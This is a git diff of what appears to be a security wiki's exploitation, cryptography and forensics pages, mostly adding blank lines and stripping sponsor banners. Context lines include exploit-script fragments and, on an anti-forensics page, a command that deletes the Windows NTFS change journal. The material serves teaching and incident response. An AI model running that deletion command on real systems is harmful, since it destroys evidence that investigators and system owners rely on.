--- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md @@ -143,3 +143,5 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index ad3191732..fbb2e56a7 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -190,3 +190,5 @@ And to bypass the address of `/bin/sh` you could create several env variables po {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 6de6060f2..54dccee09 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -102,3 +102,5 @@ There are several protections trying to prevent the exploitation of vulnerabilit {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/pointer-redirecting.md b/src/binary-exploitation/stack-overflow/pointer-redirecting.md index f92bebd28..9213444ef 100644 --- a/src/binary-exploitation/stack-overflow/pointer-redirecting.md +++ b/src/binary-exploitation/stack-overflow/pointer-redirecting.md 
@@ -27,3 +27,5 @@ You can find an example in: - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index 0cad69c6d..52ef909dc 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -113,3 +113,5 @@ ret2win-arm64.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index 410cf5cf0..ca102d444 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md @@ -187,3 +187,5 @@ p.close() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index a786dea8e..6e7d80c73 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -234,3 +234,5 @@ Also in the following page you can see the equivalent of **Ret2esp in ARM64**: {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index 187c832b7..702645a59 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md 
@@ -95,3 +95,5 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 3ad3e61ac..24585eb5c 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -79,3 +79,5 @@ The only "complicated" thing to find here would be the address in the stack to c I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/uninitialized-variables.md b/src/binary-exploitation/stack-overflow/uninitialized-variables.md index 6cde48bee..dbe8f1c01 100644 --- a/src/binary-exploitation/stack-overflow/uninitialized-variables.md +++ b/src/binary-exploitation/stack-overflow/uninitialized-variables.md @@ -66,3 +66,5 @@ int main() { This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md index fb6f62862..3758e559d 100644 --- a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md 
@@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md index c897d0035..81b4615c0 100644 --- a/src/blockchain/blockchain-and-crypto-currencies/README.md +++ b/src/blockchain/blockchain-and-crypto-currencies/README.md @@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit - [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md index 71b79f58f..cce65e9f9 100644 --- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit - [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/certificates.md b/src/crypto-and-stego/certificates.md index d0c4ad006..b7871f8e9 100644 --- a/src/crypto-and-stego/certificates.md +++ b/src/crypto-and-stego/certificates.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} - ## What is a Certificate A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. @@ -211,12 +203,6 @@ openssl asn1parse -genconf certificatename.tpl -outform PEM -out certificatename --- -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..9babc544a 100644 --- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -53,3 +53,5 @@ Now, if you can control the IV, you can change the first Byte of the IV so **IV\ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/crypto-ctfs-tricks.md b/src/crypto-and-stego/crypto-ctfs-tricks.md index bb2b5f049..d5e6a1f20 100644 --- a/src/crypto-and-stego/crypto-ctfs-tricks.md +++ b/src/crypto-and-stego/crypto-ctfs-tricks.md @@ -299,3 +299,5 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/cryptographic-algorithms/README.md b/src/crypto-and-stego/cryptographic-algorithms/README.md index bcfcf1d0a..a70912cb4 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/README.md +++ b/src/crypto-and-stego/cryptographic-algorithms/README.md @@ -183,3 +183,5 @@ Check **3 comparisons to recognise it**: ![](<../../images/image (430).png>) {{#include ../../banners/hacktricks-training.md}} + + 
diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md index 6699ec26f..fa9e007e4 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md +++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md @@ -22,3 +22,5 @@ - When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md index a09798b1e..8d1180ce1 100644 --- a/src/crypto-and-stego/electronic-code-book-ecb.md +++ b/src/crypto-and-stego/electronic-code-book-ecb.md @@ -72,3 +72,5 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 2faf6564f..2b1be3259 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -67,3 +67,5 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index 51a38df3f..b24f88bd8 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -36,3 +36,5 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} + + 
diff --git a/src/crypto-and-stego/padding-oracle-priv.md b/src/crypto-and-stego/padding-oracle-priv.md index 96d3145a3..3e4d1dbb3 100644 --- a/src/crypto-and-stego/padding-oracle-priv.md +++ b/src/crypto-and-stego/padding-oracle-priv.md @@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://websec.nl/" %} - ## CBC - Cipher Block Chaining In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: @@ -107,6 +105,7 @@ But if you BF the padding (using padbuster for example) you manage to get anothe - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation) -{% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index dc89fa296..00e933705 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -9,3 +9,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/stego-tricks.md b/src/crypto-and-stego/stego-tricks.md index 91ed86406..d62dec11c 100644 --- a/src/crypto-and-stego/stego-tricks.md +++ b/src/crypto-and-stego/stego-tricks.md @@ -218,3 +218,5 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/ - [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/certificates.md b/src/cryptography/certificates.md index 622b48c61..777620734 100644 --- a/src/cryptography/certificates.md +++ b/src/cryptography/certificates.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## What is a Certificate A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. @@ -184,12 +176,6 @@ openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certif --- -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..9babc544a 100644 --- a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -53,3 +53,5 @@ Now, if you can control the IV, you can change the first Byte of the IV so **IV\ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/crypto-ctfs-tricks.md b/src/cryptography/crypto-ctfs-tricks.md index bb2b5f049..d5e6a1f20 100644 --- a/src/cryptography/crypto-ctfs-tricks.md +++ b/src/cryptography/crypto-ctfs-tricks.md @@ -299,3 +299,5 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/electronic-code-book-ecb.md b/src/cryptography/electronic-code-book-ecb.md index a09798b1e..8d1180ce1 100644 --- a/src/cryptography/electronic-code-book-ecb.md +++ b/src/cryptography/electronic-code-book-ecb.md @@ -72,3 +72,5 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md index 837cedd01..3bcd0e4a2 100644 
--- a/src/cryptography/hash-length-extension-attack.md +++ b/src/cryptography/hash-length-extension-attack.md @@ -34,3 +34,5 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/padding-oracle-priv.md b/src/cryptography/padding-oracle-priv.md index 499b42d4b..faa40fa94 100644 --- a/src/cryptography/padding-oracle-priv.md +++ b/src/cryptography/padding-oracle-priv.md @@ -2,8 +2,6 @@
-{% embed url="https://websec.nl/" %} - # CBC - Cipher Block Chaining In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: @@ -109,6 +107,6 @@ But if you BF the padding (using padbuster for example) you manage to get anothe
-{% embed url="https://websec.nl/" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md index dc89fa296..00e933705 100644 --- a/src/cryptography/rc4-encrypt-and-decrypt.md +++ b/src/cryptography/rc4-encrypt-and-decrypt.md @@ -9,3 +9,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/emails-vulns.md b/src/emails-vulns.md index 15d9cc343..42d15f27f 100644 --- a/src/emails-vulns.md +++ b/src/emails-vulns.md @@ -8,3 +8,4 @@ {{#include ./banners/hacktricks-training.md}} + diff --git a/src/exploiting/linux-exploiting-basic-esp/README.md b/src/exploiting/linux-exploiting-basic-esp/README.md index b0feaf1a9..11fd1be6e 100644 --- a/src/exploiting/linux-exploiting-basic-esp/README.md +++ b/src/exploiting/linux-exploiting-basic-esp/README.md @@ -550,3 +550,5 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu - [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/linux-exploiting-basic-esp/fusion.md b/src/exploiting/linux-exploiting-basic-esp/fusion.md index 344a72d02..cbab78081 100644 --- a/src/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/src/exploiting/linux-exploiting-basic-esp/fusion.md @@ -62,3 +62,5 @@ r.interactive() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/tools/README.md b/src/exploiting/tools/README.md index 0ca40e712..390d37dc3 100644 --- a/src/exploiting/tools/README.md +++ b/src/exploiting/tools/README.md 
@@ -226,3 +226,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...: ![](<../../images/image (101).png>) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/tools/pwntools.md b/src/exploiting/tools/pwntools.md index a7c0aa204..0d2764cdd 100644 --- a/src/exploiting/tools/pwntools.md +++ b/src/exploiting/tools/pwntools.md @@ -172,3 +172,5 @@ pwn update ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 1f8119bb8..077f2fe7b 100644 --- a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/README.md b/src/forensics/basic-forensic-methodology/README.md index e725dfa85..531ec98f0 100644 --- a/src/forensics/basic-forensic-methodology/README.md +++ b/src/forensics/basic-forensic-methodology/README.md @@ -80,3 +80,5 @@ file-integrity-monitoring.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 615ede378..7f2512d6c 100644 --- a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,8 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} # Timestamps @@ -152,8 +149,7 @@ It's also possible to modify the configuration of which files are going to be co - `fsutil usn deletejournal /d c:` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/docker-forensics.md b/src/forensics/basic-forensic-methodology/docker-forensics.md index 629251985..17a36b6cb 100644 --- a/src/forensics/basic-forensic-methodology/docker-forensics.md +++ b/src/forensics/basic-forensic-methodology/docker-forensics.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ## Container modification @@ -122,10 +117,7 @@ Note that when you run a docker container inside a host **you can see the proces Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..a1e4d8502 100644 --- a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -24,3 +24,5 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/linux-forensics.md b/src/forensics/basic-forensic-methodology/linux-forensics.md index 8d505942f..b832648ec 100644 --- a/src/forensics/basic-forensic-methodology/linux-forensics.md +++ b/src/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,13 +1,5 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} ## Initial Information Gathering @@ -150,14 +142,6 @@ icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Search for known Malware ### Modified System Files @@ -200,14 +184,6 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" find / -type f -executable | grep ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Recover Deleted Running Binaries Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it @@ -343,14 +319,6 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ @@ -429,10 +397,4 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ {{#include ../../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/forensics/basic-forensic-methodology/malware-analysis.md b/src/forensics/basic-forensic-methodology/malware-analysis.md index c7edd6650..b3d7379c3 100644 --- a/src/forensics/basic-forensic-methodology/malware-analysis.md +++ b/src/forensics/basic-forensic-methodology/malware-analysis.md @@ -170,3 +170,5 @@ If the files of a folder **shouldn't have been modified**, you can calculate the When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 0d48e3bc2..20cd58d5d 100644 --- a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Start Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). @@ -40,10 +34,6 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 02ab3ddf6..7d45bfd90 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -234,3 +234,5 @@ You may notice that even performing that action there might be **other parts whe - **iHackLabs Certified Digital Forensics Windows** {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index cd9e13a58..26e3eca31 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -93,3 +93,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images from the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + 
diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index f076c885c..df1bcf771 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -72,3 +72,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images form the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md index 9e6ebd08d..2e592bf93 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] > A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. @@ -101,12 +95,6 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Check Exploits/Malware ### Suricata @@ -237,10 +225,6 @@ usb-keystrokes.md ​ -
